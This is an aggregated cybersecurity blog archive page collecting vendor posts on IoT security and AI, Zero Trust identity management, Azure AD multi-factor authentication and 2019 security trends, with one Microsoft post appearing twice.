Category Archives: Cybersecurity

The AI cybersecurity impact for IoT

I meet with customers around the globe in all sectorsbanks with ATM networks, energy companies with critical infrastructure, natural resource companies with remote automated operations, healthcare organizations with medical devices, manufacturing companies with production environmentsand they all have the same concerns. They want to leverage robotics and automation to grow their businesses and drive efficiency, but they are concerned about the potential for Internet of Things (IoT) based attacks, which is only exacerbated by the global scale of the cloud. Its a good news/bad news problem for companies. Technology has provided them tools for automation at scale, and the cloud is an exceptional delivery vehicle to accelerate digital transformation and growth. Yet, there is a growing concern about security related to the sensors that are critical to this business acceleration.

While news has accelerated related to the proliferation of IoT devices and their impact on network and cloud infrastructures, artificial intelligence (AI) is also becoming a household word. Organizations are building powerful machine learning engines that analyze massive sets of data at global scale, and AI is increasingly used to augment machine learning to allow machines to learn for themselves and improve the capabilities of the machine learning engine. There has been much research on the topic of AI, and the industry is poised for paid growth according to MIT and IDC. I encourage you to read the following two articles about their research:

In my last post in this series, I explained how AI will enhance the predictive capabilities of security information and event management solutions. I also wrote about how we will use AI to protect access. In this blog, Ill provide insight into how the security community is working to secure IoT devices today, and how AI will enhance those efforts over time.

The IoT security challenge

Much of the noise and commentary related to the proliferation of IoT devices and their impact on network and cloud infrastructures became a priority post the Mirai bot attack in 2016 and the realization that any device that is connected to the internet could be used as a means to attack critical infrastructure to bring down major portions of telecommunications, energy, and other parts of the systems we all rely on daily. The consumerization of IoT attacks was a tipping point for both consumers and organizations. While organizations were already down the path to securing their systems from the potential of IoT vulnerabilities, the pressure from the board and other non-security executives increased in tandem as understanding and awareness rose.

The business potential of IoT is incredible. However, as cybersecurity experts, there are several questions we must address:

  • How do organizations secure their environments from the potential of an attackunknown to themfrom an IoT device?
  • How do they authenticate what devices are attempting to access their environments?
  • How to do they understand the behavior of these devices while they are access the environment?
  • How do they quarantine or update these devices to make them safer?
  • How do they digitally transform and take advantage of robotics and modernizationrolling out systems at scale that do not have humans to manage themwithout the ability to authenticate or monitor the devices that are imbedded in these systems and understand their impact or security threat to their infrastructure?

With this framing, what are the answers? To provide that insight, we need to group IoT devices into two categories: legacy and new. Lets start with new, as this is the easier problem to solve (at least as easy as any security problem is to solve). Today, there are new IoT devices in market, with security built in via the engineering process. A great example is Azure Sphere. IoT devices powered by Azure Sphere are built with a hardened chip that is embedded with a secure Linux OS. Our Azure IoT team is already conducting work that senses IoT devices. The ability to build in security as part of the manufacturing process of the new IoT devices will definitely assist the industry in the future but doesnt solve the hardest problem: legacy IoT devices.

Legacy devices and IoT

Whether your legacy sensors are in manufacturing devices, medical equipment, offshore drilling rigs, the electrical grid, your ATMs, or thermostats in your home, there are known and valid concerns about the security of the devices. Now factor in malware or DDoS and the threat cannot be overstated. The attack surface is massive when you consider that there are at least nine billion IoT sensor devices joining the net every year. These devices are largely manufactured without security in mind, and oftentimes even the default password cannot be changed. Defense in depth is the answer hereas with most other things in securityand there are currently some solutions and future solutions that will improve the security posture of IoT devices entering an organizations on-premises network or cloud environment.

The traditional vulnerability management companies focus on scanning devices and network environments for vulnerabilities. Vulnerability management will continue to be a critical aspect of IoT security, as the devices can be identified, and a small set of data can potentially be gathered from them. However, the traditional vulnerability management companies were purpose-built for traditional systems, not for IoT device sensing, though they are developing capabilities to handle a more universal set of devices. This has created a market for CyberX and others that were formed to largely address IoT securityparticularly in the OT space. These are real solutions that need serious consideration from the market as a defense in depth solution is built for IoT. Its potentially an oversimplification to state that IoT devices are just another device that shouldnt be inherently trusted, but if you take this approach, you will engineer an environment that improves your all-up device securityinclusive of IoT. This is the approach Microsoft is taking around Zero Trust. Read the first of our blog series on Zero Trust strategy to learn more.

The role of AI

In addition to scanning devices, architecting a Zero Trust network and building new solutions via Azure Sphere and secure hardware/hardened OS, there is a need to go further to protect environments built at global scale. This is where I believe AI has a strong use case.

Machine learning engines can be trained to identify devices based on their hardcoded attributes and behavior. AI can further refine these models by allowing sensing engines to autonomously learn over time what is normal behavior for these devices once they are actually on your network. These sophisticated engines are a brilliant resource to augment other controls that are already in place. Machine learning engines that are built to scale and augmented with AI can evolve and learn in real-time and have the capability to build models that can work in milliseconds, allowing a rules engine to block or quarantine devices that are not behaving as expected before they can potentially damage the environment. They can also work together to identify the devices via algorithms and behavioral modeling, regardless of whether they have seen the specific device previously. The behavior of classes of devices or the models that can be built based on device behavior is much more important than the specific device. As the AI models continue to learn, the specifics of a particular device become less important than the application or use case for the device.

Imagine a scenario where a healthcare organization has cardiology devices that provide anonymized information on overall patient health and outcomes from a particular surgical procedure. This device will be expected to provide a certain set of data in a certain taxonomy, like heart rate, blood pressure, blood oxygen count. This data is predictable for the device and the way the device communicates with the reporting system that is either cloud or network attached is also predictable. It is, thus, very straightforward to understand if the device is not communicating as expected or the data is not in the expected format, a security organization can quickly isolate the device for further forensics to determine if it is somehow corrupted or if the device is simply malfunctioning and then take the appropriate steps to either repair or replace the device.

Take this example further and imagine the same healthcare organization deploys a new class of cardiology devicesperhaps a new manufacturer or an updated device. The machine learning engine will have a first experience with the new device; however, it will have been trained to learn the normal communication and behavior of the legacy devices. Based on these learnings, the machine learning engine will already have expectations about how the new device communicates and behaves regardless of the fact the new device is actually unknown to the machine learning engine. AI will model the outcome of the expected behavior and can accelerate the device detection for new devices and new classes of devices because the AI engine is continually learning on its own and does not need human intervention to program. AI can also operate on global, cloud scale and provide information in near real-time so decisioning is in milliseconds, not moments. We have examples of this related to malware detection, which will be my next blog in this series. Also on my mind for an upcoming blog is how agents can be corrupted and how AI can quickly identify these corrupt agents and data itself as a new supply chain threat to AI/machine learning models. But more on that later.

As I continue to think about use cases for AI that are applicable today and can assist us in solving the largest and most complex security problems, the ability to detect IoT devices based on both their identity and behavior is absolutely a place where there is an opportunity for high value industry impact. This includes what I believe is the most interesting and potentially vulnerable piece of this equation: the data supply chain, where introducing corrupt data sets into a machine learning/AI model can cause corruption on the output and deliberately weaken the ability for AI/machine learning as a security tool. Learn more about how Microsoft is securing the future of AI and machine learning in this new white paper.

As we learn more about these devices and as organizations increase their use of robotic process automation and IoT sensors for multiple applications, we can increase the overall confidence and ability for organizations to modernize and accelerate their transformation. Given the proliferation of IoT devices, this is one of the core scenarios security professionals must provide solutions for now and in the very near future.

The post The AI cybersecurity impact for IoT appeared first on Microsoft Secure.

Microsoft Secure: The AI cybersecurity impact for IoT

I meet with customers around the globe in all sectorsbanks with ATM networks, energy companies with critical infrastructure, natural resource companies with remote automated operations, healthcare organizations with medical devices, manufacturing companies with production environmentsand they all have the same concerns. They want to leverage robotics and automation to grow their businesses and drive efficiency, but they are concerned about the potential for Internet of Things (IoT) based attacks, which is only exacerbated by the global scale of the cloud. Its a good news/bad news problem for companies. Technology has provided them tools for automation at scale, and the cloud is an exceptional delivery vehicle to accelerate digital transformation and growth. Yet, there is a growing concern about security related to the sensors that are critical to this business acceleration.

While news has accelerated related to the proliferation of IoT devices and their impact on network and cloud infrastructures, artificial intelligence (AI) is also becoming a household word. Organizations are building powerful machine learning engines that analyze massive sets of data at global scale, and AI is increasingly used to augment machine learning to allow machines to learn for themselves and improve the capabilities of the machine learning engine. There has been much research on the topic of AI, and the industry is poised for paid growth according to MIT and IDC. I encourage you to read the following two articles about their research:

In my last post in this series, I explained how AI will enhance the predictive capabilities of security information and event management solutions. I also wrote about how we will use AI to protect access. In this blog, Ill provide insight into how the security community is working to secure IoT devices today, and how AI will enhance those efforts over time.

The IoT security challenge

Much of the noise and commentary related to the proliferation of IoT devices and their impact on network and cloud infrastructures became a priority post the Mirai bot attack in 2016 and the realization that any device that is connected to the internet could be used as a means to attack critical infrastructure to bring down major portions of telecommunications, energy, and other parts of the systems we all rely on daily. The consumerization of IoT attacks was a tipping point for both consumers and organizations. While organizations were already down the path to securing their systems from the potential of IoT vulnerabilities, the pressure from the board and other non-security executives increased in tandem as understanding and awareness rose.

The business potential of IoT is incredible. However, as cybersecurity experts, there are several questions we must address:

  • How do organizations secure their environments from the potential of an attackunknown to themfrom an IoT device?
  • How do they authenticate what devices are attempting to access their environments?
  • How to do they understand the behavior of these devices while they are access the environment?
  • How do they quarantine or update these devices to make them safer?
  • How do they digitally transform and take advantage of robotics and modernizationrolling out systems at scale that do not have humans to manage themwithout the ability to authenticate or monitor the devices that are imbedded in these systems and understand their impact or security threat to their infrastructure?

With this framing, what are the answers? To provide that insight, we need to group IoT devices into two categories: legacy and new. Lets start with new, as this is the easier problem to solve (at least as easy as any security problem is to solve). Today, there are new IoT devices in market, with security built in via the engineering process. A great example is Azure Sphere. IoT devices powered by Azure Sphere are built with a hardened chip that is embedded with a secure Linux OS. Our Azure IoT team is already conducting work that senses IoT devices. The ability to build in security as part of the manufacturing process of the new IoT devices will definitely assist the industry in the future but doesnt solve the hardest problem: legacy IoT devices.

Legacy devices and IoT

Whether your legacy sensors are in manufacturing devices, medical equipment, offshore drilling rigs, the electrical grid, your ATMs, or thermostats in your home, there are known and valid concerns about the security of the devices. Now factor in malware or DDoS and the threat cannot be overstated. The attack surface is massive when you consider that there are at least nine billion IoT sensor devices joining the net every year. These devices are largely manufactured without security in mind, and oftentimes even the default password cannot be changed. Defense in depth is the answer hereas with most other things in securityand there are currently some solutions and future solutions that will improve the security posture of IoT devices entering an organizations on-premises network or cloud environment.

The traditional vulnerability management companies focus on scanning devices and network environments for vulnerabilities. Vulnerability management will continue to be a critical aspect of IoT security, as the devices can be identified, and a small set of data can potentially be gathered from them. However, the traditional vulnerability management companies were purpose-built for traditional systems, not for IoT device sensing, though they are developing capabilities to handle a more universal set of devices. This has created a market for CyberX and others that were formed to largely address IoT securityparticularly in the OT space. These are real solutions that need serious consideration from the market as a defense in depth solution is built for IoT. Its potentially an oversimplification to state that IoT devices are just another device that shouldnt be inherently trusted, but if you take this approach, you will engineer an environment that improves your all-up device securityinclusive of IoT. This is the approach Microsoft is taking around Zero Trust. Read the first of our blog series on Zero Trust strategy to learn more.

The role of AI

In addition to scanning devices, architecting a Zero Trust network and building new solutions via Azure Sphere and secure hardware/hardened OS, there is a need to go further to protect environments built at global scale. This is where I believe AI has a strong use case.

Machine learning engines can be trained to identify devices based on their hardcoded attributes and behavior. AI can further refine these models by allowing sensing engines to autonomously learn over time what is normal behavior for these devices once they are actually on your network. These sophisticated engines are a brilliant resource to augment other controls that are already in place. Machine learning engines that are built to scale and augmented with AI can evolve and learn in real-time and have the capability to build models that can work in milliseconds, allowing a rules engine to block or quarantine devices that are not behaving as expected before they can potentially damage the environment. They can also work together to identify the devices via algorithms and behavioral modeling, regardless of whether they have seen the specific device previously. The behavior of classes of devices or the models that can be built based on device behavior is much more important than the specific device. As the AI models continue to learn, the specifics of a particular device become less important than the application or use case for the device.

Imagine a scenario where a healthcare organization has cardiology devices that provide anonymized information on overall patient health and outcomes from a particular surgical procedure. This device will be expected to provide a certain set of data in a certain taxonomy, like heart rate, blood pressure, blood oxygen count. This data is predictable for the device and the way the device communicates with the reporting system that is either cloud or network attached is also predictable. It is, thus, very straightforward to understand if the device is not communicating as expected or the data is not in the expected format, a security organization can quickly isolate the device for further forensics to determine if it is somehow corrupted or if the device is simply malfunctioning and then take the appropriate steps to either repair or replace the device.

Take this example further and imagine the same healthcare organization deploys a new class of cardiology devicesperhaps a new manufacturer or an updated device. The machine learning engine will have a first experience with the new device; however, it will have been trained to learn the normal communication and behavior of the legacy devices. Based on these learnings, the machine learning engine will already have expectations about how the new device communicates and behaves regardless of the fact the new device is actually unknown to the machine learning engine. AI will model the outcome of the expected behavior and can accelerate the device detection for new devices and new classes of devices because the AI engine is continually learning on its own and does not need human intervention to program. AI can also operate on global, cloud scale and provide information in near real-time so decisioning is in milliseconds, not moments. We have examples of this related to malware detection, which will be my next blog in this series. Also on my mind for an upcoming blog is how agents can be corrupted and how AI can quickly identify these corrupt agents and data itself as a new supply chain threat to AI/machine learning models. But more on that later.

As I continue to think about use cases for AI that are applicable today and can assist us in solving the largest and most complex security problems, the ability to detect IoT devices based on both their identity and behavior is absolutely a place where there is an opportunity for high value industry impact. This includes what I believe is the most interesting and potentially vulnerable piece of this equation: the data supply chain, where introducing corrupt data sets into a machine learning/AI model can cause corruption on the output and deliberately weaken the ability for AI/machine learning as a security tool. Learn more about how Microsoft is securing the future of AI and machine learning in this new white paper.

As we learn more about these devices and as organizations increase their use of robotic process automation and IoT sensors for multiple applications, we can increase the overall confidence and ability for organizations to modernize and accelerate their transformation. Given the proliferation of IoT devices, this is one of the core scenarios security professionals must provide solutions for now and in the very near future.

The post The AI cybersecurity impact for IoT appeared first on Microsoft Secure.



Microsoft Secure

Radware Blog: Top 6 Threat Discoveries of 2018

Over the course of 2018, Radware’s Emergency Response Team (ERT) identified several cyberattacks and security threats across the globe. Below is a round-up of our top discoveries from the past year. For more detailed information on each attack, please visit DDoS Warriors. DemonBot Radware’s Threat Research Center has been monitoring and tracking a malicious agent […]

The post Top 6 Threat Discoveries of 2018 appeared first on Radware Blog.



Radware Blog

What CES Can Show Us About Evolving Consumer Security Needs: A Timeline

Appropriately dubbed the ‘Global Stage for Innovation,’ it’s no wonder CES showcases the most cutting-edge consumer technologies coming out in the year ahead. No topic is off the table; Attendees will learn more about connected homes, smart cities and self-driving cars, try out shiny new digital health wearables, headsets, and other connected tech, explore AI-driven technologies, and so much more.

Although events like CES showcase breakthrough technologies, interestingly, they also highlight how rapidly new technology is replaced with the next new thing. The rate at which we are treading on new ground is shifting exponentially, and what we see at CES this January might be obsolete in just a few years.

This rapidly changing technological landscape poses a significant predicament to consumers, a ‘digital dilemma’ if you will: as new technologies accelerate and IoT devices that house them progress, new challenges arise with them. This is particularly the case when it comes to security and privacy. And, just as security and products change and adapt, so do our needs and wants as consumers. Those of a teen differ from those of a parent, from those of a baby boomer, and so on. Let’s see how those needs change over time.

A Digital Life Timeline

2015: The Teen Technologist

Born in the late ‘90s, this teen is an everyday gamer, who loves to play games online with friends. They also love their smartphone, mostly for the access to social media. A teen wouldn’t necessarily be concerned with security, so having a comprehensive system built in is crucial.

2021: The Young Professional

Entering the workforce for the first time, the young professional is finally able to buy the gadgets that were once luxuries. They might have two phones; one for work and a personal device. Additionally, they are bringing more connected devices into their home, so the need for a secure home network has become obvious. They are also always on the go and having to connect to public Wi-Fi, so a Virtual Private Network (VPN) should be considered.

2032: The Concerned Parent

Fast forward almost ten years, the young professional has become a worrying parent. Their kids are spending too much time on screens. Having a way to monitor what they are doing on the internet and limit their time online is crucial, and an application that could  provide parental controls would be welcomed. Also, as they bring larger, more connected devices into the home, like smart refrigerators and thermostats, they are excited about a platform that will bake in security through a home network.

2038: The Brand Loyalists

The concerned parent has found devices they like and those they do not like. But more importantly, they have found brands they love, and they may continue to purchase from to bring the latest technology into their family’s lives. A comprehensive security system that covers all types of devices is exactly what they would need to keep a layer of protection

2045: The Unacquainted User

At this point in a digital journey, our user has stopped keeping up with trends because things have changed so much. Almost to the point where they are unwilling to learn new tech, or are untrusting of it all together. But the need to maintain their security and privacy is still top of mind –especially as cybercriminals often prey on this demographic due to being an easy target. A person like this might worry about ransomware, viruses, and identity theft along with protecting their home network.

As you can see, a person’s security and safety needs, desires, and even their devices evolve depending on the moment in which they are within their life. With so much in flux, the last thing anyone wants to think about is security – but with constantly changing technology at an all-time high, it’s safe to bet that threats will evolve to keep pace, and so should the ways in which we protect devices. For these reasons, it’s important to leverage a security partner that will keep this in mind, and will grow with not only our evolving needs, but evolving technology, too.

To learn more about consumer security and our approach to it, be sure to follow us at @McAfee and @McAfee_Home.

The post What CES Can Show Us About Evolving Consumer Security Needs: A Timeline appeared first on McAfee Blogs.

Delivering security and continuity for the cities of tomorrow

It’s seems like almost every part of our lives is now being supported by emerging technologies, from predictive analytics and artificial intelligence to the Internet of Things (IoT). First, we had smart phones, then smart watches and now smart cities. Currently, more than half of the world’s population lives in towns and cities, and by 2050 this number could rise to 66 per cent. This is resulting in a growing need for solutions to effectively … More

The post Delivering security and continuity for the cities of tomorrow appeared first on Help Net Security.

Warding off security vulnerabilities with centralized data

This is the second article of a series, the first article is available here. File access permissions Having a system that lets you set the proper permissions and prevents unauthorized people from accessing files is important. However, you should expect that human error will lead to unwanted vulnerabilities. Expecting your users to manually set permissions on each file without ever making a mistake is unrealistic and bad for security and compliance. The key to getting … More

The post Warding off security vulnerabilities with centralized data appeared first on Help Net Security.

Insight into the growing problem of highly sophisticated fraud

Sophisticated fraud campaigns are beginning to outwit machine learning solutions especially the ones that only detect known fraud patterns based on historic loss experience, according to DataVisor. The median lifetime of IP fraud signals is only 3.5 days As bad actors begin using modern technologies (even machine learning) in their attacks, enterprises must bolster detection efforts with a complete solution that can also detect new and emerging fraud patterns and detect them early, or risk … More

The post Insight into the growing problem of highly sophisticated fraud appeared first on Help Net Security.

Hackers have become increasingly deft at stealing student data

Data collection is a vital resource for educational institutions across the world, including student records, which contain highly sensitive material such as a student’s name, address and social security number, and often test scores, behavioral assessments, personal health data and more. Research project data at leading universities is a ripe target for cyber criminals and nation states. The 2018 Education Cybersecurity Report shows that out of 17 industries in the U.S., education ranks last in … More

The post Hackers have become increasingly deft at stealing student data appeared first on Help Net Security.

Zero Trust part 1: Identity and access management

Once in a while, a simple phrase captures our imagination, expressing a great way to think about a problem. Zero Trust is such a phrase. Today, Ill define Zero Trust and then discuss the first step to enabling a Zero Trust modelstrong identity and access management. In subsequent blogs, well cover each capability of a Zero Trust model in detail and how Microsoft helps you in these areas and end the series of blogs by discussing Microsofts holistic approach to Zero Trust and our framework.

Zero Trust definedeverything is on the open internet

In some ways, the easiest way to think about Zero Trust is to assume everything is on the open internet, even resources we think are safe in our walled gardens. With Zero Trust, we move from the world of implicit assumptions made based on single elements to explicit verification of all elements of access.

Attacks are at an all-time high, and most are effective because of assumptions based on the idea that users are safe on corporate networks. These assumptions may have made sense 25 years ago because only email could flow beyond the corporate network, remote work was rare, and personal device use for work was virtually unheard of.

But even in the early days, hackers took advantage of these assumptions. From abusing dial-in numbers for remote work on FTP servers to stealing credentials for email, attackers have long known that once you have ports facing the outside world, your whole network is out there too.

You may have hardened your external access points by requiring Multi-Factor Authentication (MFA) or certifications to access your VPN, but in our investigations we see time and time again that either because of new exploits, or because of exceptions made to reduce friction with demanding (and sometimes VIP) workers, the assumption that if they are on my network, its OK is not good enough.

First step to enable a Zero Trust modelstrong identity and access management

When we talk about a Zero Trust modeland assuming that all of our users, applications, machines, and users are on the internetwe move from a model of implicit trust to one of explicit verification, where:

  • Rather than assuming we have a user that is in a high assurance session (for example: MFA) because of the network, we verify the claim explicitly.
  • Instead of assuming the user has a valid machine because of the network, we verify the device explicitly.
  • Instead of allowing access to file shares because the user is on the network, we explicitly classify and encrypt dataand so forth.

Increasingly, everything is on the open internet. When your users access their cloud-hosted email from a personal smartphone in a caf on a business trip, virtually all elements of that interaction are outside of your traditional walled garden. The device, network, and application (code and hardware) fall outside and are not in your direct control, but your ability to validate and set policy on them is.

With the many networks, devices, and applications needed in daily business, the only common denominator is the user. This is why weve said, Identity is the control plane. Its critical to establish who the user is as the core of trust for other transactions. If we arent sure who the user is, no other system access control or security matters. Once we are sure of the user, we can explicitly verify every element of access whether our resources are on-premises, in cloud-hosted servers, or managed by third-party SaaS apps like Office 365.

A robust Zero Trust strategy considers the full context of the session to determine its overall risk: the identity of the user plus the state of their device, the apps theyre using, and the sensitivity of the data theyre trying to access. It then applies holistic policies that define when to allow, block, or restrict access, or control it by requiring additional authentication challenges such as MFA, limiting functionality such as downloads, or applying compliance controls such as terms of use. This way, a hacker trying to gain access using stolen credentials on an unknown device will be blocked, as will a verified user running a healthy device trying to access data they dont have permission to see. This strategy not only protects against external threats, but it also helps create guardrails so well-meaning employees can use organizational resources responsibly.

Azure Active Directory (Azure AD) provides the strong, adaptive, standards-based identity verification required in a Zero Trust framework. While Azure AD provides intrinsically strong authentication (including automatic adaptive protection against many attacks), it also allows admins to express their access requirements in simple terms. Virtually every aspect of each sign-in (including associated user or session risk) is available to define the conditions under which access policies are applied. A framework of controls such as additional authentication factors, terms of use, limited access, and other session semantics regulates access. This guarantees we are secure at access in our Zero Trust approach.

Azure AD conditional access applies intelligent policies to signals about users, devices, locations, and apps.

A successful Zero Trust strategy requires seamless and flexible access to applications, systems, and data while maintaining security for both users and the resources they need to do their jobs. It requires being cloud-ready, starting with identity, and then taking steps that will help secure all areas of your environment to:

  • Strengthen your credentials. If users in your identity system are using weak passwords and not strengthening them with MFA, it isn’t a matter of if or when you get compromisedjust how often you will be compromised.
  • Reduce your attack surface area. To make life harder for hackers, eliminate using older, less secure protocols, limit access entry points, and exercise more significant control of administrative access to resources.
  • Automate threat response. Reduce costs and risks by reducing the time criminals have to embed themselves into your environment.
  • Increase your awareness. Use auditing and logging of security-related events and related alerts to help detect patterns that may indicate internal attacks or attempted or successful external penetration of your network.
  • Enable user self-help. Reduce friction by empowering your users to stay productive, even as you remain vigilant.

Read Five steps to securing your identity infrastructure to learn more.

Next in our series on Zero Trustkeeping data safe

Identity and access management is one important element of your Zero Trust strategyalong with others such as data encryption, analytics, device verification, and automation. In part 2 of our Zero Trust series, well talk about keeping data safe as part of your Zero Trust model. To learn more about how identity and access management enable a Zero Trust model, listen to our webcast.For more details about Zero Trust, read Building Zero Trust networks with Microsoft 365.

The post Zero Trust part 1: Identity and access management appeared first on Microsoft Secure.

Step 2. Manage authentication and safeguard access: top 10 actions to secure your environment

This series outlines the most fundamental steps you can take with your investment in Microsoft 365 security solutions. We will provide advice on activities such as setting up identity management through active directory, malware protection, and more. In this post, we explain how to enable single sign-on (SSO) in Azure Active Directory (Azure AD) to manage authentication across devices, cloud apps, and on-premises apps, and then how to set up Multi-Factor Authentication (MFA) to authenticate user sign-ins through a mobile app, phone call, or SMS.

Balancing employee productivity needs with enterprise security begins with protecting identities. Gone are the days when users accessed corporate resources behind a firewall using corporate-issued devices. Your employees and partners use multiple devices and apps for work. They share documents with other users via cloud productivity apps and email, and they switch between personal and work-related apps and devices throughout the day. This has created a world of opportunity for sophisticated cybercriminals.

Hackers know that users often use the same weak password for all their accounts. Sophisticated cybercriminals employ several tactics to take advantage of these vulnerabilities. Password spray is a method of trying common passwords against known account lists. In a breach relay, a malicious actor steals a password from one organization and then uses the password to try to access other networks. Phishing campaigns trick users into handing over the password directly to the hacker. Azure AD provides several features to reduce the likelihood of all three of these attack methods.

Access credentials in the form of email addresses and passwords are the two most compromised data typesat 44.3 percent and 40 percent, respectively.
Source: Dark Reading Date: November 2017

Simplify user access with Azure AD single sign-on

Most enterprise security breaches begin with a compromised user account that makes protecting those accounts a critical priority. If you manage a hybrid environment, the first step is to create a single common identity for all your users. We recommend password hash sync as your primary authentication method if possible. If you use federation services to authenticate users, be sure to enable extranet lockout. You can read about these and other hybrid identity security recommendations in the first blog in this series: Step 1. Identify users: top 10 actions to secure your environment.

One huge advantage of a hybrid deployment is that you can set up SSO. Users already sign in to on-premises resources using a username and password they know. Azure AD SSO lets them use the same set of credentials to access on-premises resources plus Office 365 apps. You can then increase productivity further by extending SSO to include more cloud SaaS and on-premises apps through AppProxy. Cloud-only customers gain the same productivity benefits by setting up SSO across Azure AD, Office 365, and Azure AD-connected cloud applications.

You can use the SSO deployment plan as a step-by-step guide to walk you through the implementation process of adding more apps to your SSO solution.

Strengthen your credentials

Given the frequency with which credentials are stolen, guessed, or phished, both cloud and hybrid customers should enable Azure MFA to add another layer of security to their accounts (Figure 1). MFA protects everything under the SSO identity system, including cloud SaaS and on-premises apps published with AppProxy, significantly decreasing the odds that a compromised identity will result in a security breach.

MFA works by requiring two or more of the following authentication methods:

  • Something you know (typically a password).
  • Something you have (a trusted device that is not easily duplicated, like a phone).
  • Something you are (biometrics).

You can use the MFA deployment plan as a step-by-step guide to walk you through the implementation process.

Figure 1. MFA works by requiring two or more authentication methods.

One of the reasons users select weak or common passwords is because lengthy passwords that require numbers, letters, and special characters are difficult to remember, especially if they must be changed every few months. Microsoft recommends that you disable these rules, and instead prohibit users from choosing common passwords. If you are a hybrid customer, you will need to deploy Azure AD password protection agents on-premises to enable this feature. Azure AD password protection blocks users from choosing common passwords and any custom passwords that you configure. If you implement password hash synchronization as a primary or backup authentication method, you will have access to a leaked user credentials report, which provides usernames and password pairs that have been leaked to the dark web.

Better yet, move away from passwords entirely. One of the reasons passwords are frequently stolen is that they work from anywhere. Windows Hello allows users to set up device authentication using either a PIN or biometrics, such as a fingerprint scanner or face recognition. This form of authentication is easier for users because they dont have to remember complex passwords, but it is also safer because the authentication method is tied to the device. A hacker would have to gain possession of the device and the biometrics or PIN to compromise your network.

Enable productivity with self-service

The Azure self-service portal allows you to turn over common tasks to your users, saving your help desk time without increasing your risks. Azure AD self-service password reset (SSPR) offers a simple means for users to reset their passwords or unlock accounts without administrator intervention. You can also give users the ability to manage groups using Azure AD security groups and Office 365 groups. Known as self-service group management, this feature allows group owners who are not assigned an administrative role to create and manage groups without relying on administrators to handle their requests. Letting users reset their own passwords and manage groups gets them back to productive work quickly while reducing your tech support costs.

You can use the SSPR deployment plan as a step-by-step guide to walk you through the implementation process.

In future blog posts, we will provide additional Azure AD configuration recommendations to help secure your identities. We will then touch on the recommended security best practices to protect your apps, devices, and infrastructure.

Learn more

Check back in a few weeks for our next blog post: Step 3. Protect your identities. In this post, well dive into additional protections you can apply to your identities to ensure that only authorized people access the appropriate data and apps.

Get deployment help now

FastTrack for Microsoft 365 provides end-to-end guidance to set up your security products. FastTrack is a deployment and adoption service that comes at no charge with your subscription. Get started at FastTrack for Microsoft 365.

Resources

The post Step 2. Manage authentication and safeguard access: top 10 actions to secure your environment appeared first on Microsoft Secure.

The Year Ahead: Cybersecurity Trends To Look Out for In 2019

A Proven Record Tracking Cybersecurity Trends

This time of the year is always exciting for us, as we get to take a step back, analyze how we did throughout the year, and look ahead at what the coming year will bring. Taking full advantage of our team’s expertise in data and application security, and mining insights from our global customer base, we’ve decided to take a different approach this time around and focus on three key, and overriding trends we see taking center stage in 2019.

2018 brought with it the proliferation of both data and application security events and, as we predicted, data breaches grew in size and frequency and cloud security took center stage globally. With that in mind, let’s take a look at what next year holds.

Data breaches aren’t going away anytime soon, which will bolster regulation and subsequent compliance initiatives

Look, there’ll be breaches, and the result of that is going to be more regulation, and therefore, more compliance, this is a given. In fact, the average cost of a data breach in the US 2018 exceeded $7 million.

Whether it’s GDPR, the Australian Privacy Law, Thailand’s new privacy laws or Turkey’s KVKK; it doesn’t matter where you are, regulation is becoming the standard whether it be a regional, group, or an individual country standard.

Traditionally when we looked at data breaches, the United States lit up the map, but as regulatory frameworks and subsequent compliance measures expand globally, we’re going to see a change.

The annual number of data breaches and exposed records in the United States from 2005 to 2018 (in millions) [Statista]

What you ’ll see in 2019, and certainly, as we move forward, is a red rosy glow covering the entire globe. In 2019 you’ll hear more of “It’s not just the United States. This happens everywhere.”

 

Let’s unpack this for a second. If you were going to steal private data or credit card details, why would you do it in an environment that has world-class, or even mediocre cybersecurity measures in place? If everyone else is even slightly less protected, that’s where you’re going to find people targeting data, but we hear more about it in regions where regulation and compliance is a major focus.

 

To that end, we don’t necessarily see 2019 as the year where regulators start hitting companies with massive fines for compliance. Maybe by the end of the year, or if you see outright egregious negligence. But, you’ll find that companies have put in the legwork when it comes to compliance.

Having your head in the cloud(s) when it comes to managing risk… not a bad idea

McKinsey reports that, by 2020, organizations will be spending more than six times on cloud-specific products than they do on general IT services; and according to a survey by LogicMonitor, up to 83% of all enterprise workloads will be in the cloud around that same time.

LogicMonitor’s Future of the Cloud Study [Forbes]

Organizations continue to capitalize on the business benefits of the digital economy and, as such, end up chunking more data into the cloud. Now, we’re not saying that this is being done without some forethought, but are they classifying data as they go along and increasingly open their businesses up to the cloud?

 

Teams need to recognize that, as they transition their data to the cloud, they transition their awareness of what’s in the cloud; who is using it, when they’re using it, and why they’re using it. 2019 isn’t going be the year that businesses figure out they need to do that. What we will see, however, is increasingly cloud-friendly solutions hit the market to solve these challenges.

Social Engineering and the rise of AI and machine learning in meeting staffing issues

One of 2019’s most critical developments will be how the cybersecurity industry steps up to meet the increasing pressure on security teams to perform. According to the Global Information Security Workforce Study, the shortage of cybersecurity professionals will hit 1.8 million by 2022, but at the same time, a report by ESG shows just nine percent of millennials are interested in a career in cybersecurity.

 

What we’re going to see is how AI  and machine learning in cybersecurity technology will close the gaps in both numbers and diversity of skills.

 

Organizations today have to solve the problem of cybersecurity by hiring for a host of specialized competencies; network security, application security, data security, email security and now, cloud security. Whatever it is, underscore security, those skills are crucial to any organization’s security posture.

 

Here’s the thing, there aren’t a lot of people that claim to know cloud security, database security, application security, data security, or file security. There just isn’t a lot. We know that and we know businesses are trying to solve that problem, often by doing the same old things they’ve always done, which is the most common solution. Do more antimalware, do more antivirus, do more things that don’t work. In some cases, however, they’re doing things around AI and trying to solve the problem by leveraging technology. The latter will lead to a shift where organizations dive into subscription services.

 

There are two facets driving this behavior: the first is the fact that, yes, they realize that they are not the experts, but that there are experts out there. Unfortunately, they just don’t work for them, they work for the companies that are offering this as a service.

 

Secondly, companies are recognizing that there’s an advantage in going to the cloud, because, and this is a major determining factor, it’s an OpEx, not CapEx. The same thing is true of subscription services whether that be in the cloud or on-prem, it doesn’t matter. Driven by skills shortages and cost, 2019 will see an upswing in subscription services, where organizations are actually solving cybersecurity problems for you.

 

We should add here, however, that as more organizations turn to AI and machine learning-based decision making for their security controls, attackers will try to leverage that to overcome those same defenses.

Special mention: The ‘trickledown effect’ of Cyberwarfare

The fact is, cyber attacks between nations do happen, and it’s a give and take situation. This is the world we live in, these are acceptable types of behavior, quite frankly, right now, that won’t necessarily lead to war these days. But someone still stands to gain.

 

Specifically, they’re attacking third-party business, contractors and financial institutions. That’s why cybersecurity is so important, there needs to be an awareness that somebody might be stealing your data for monetary gain. It might be somebody stealing your data for political gain too, and protecting that data is just as critical, regardless of who’s taking it.

 

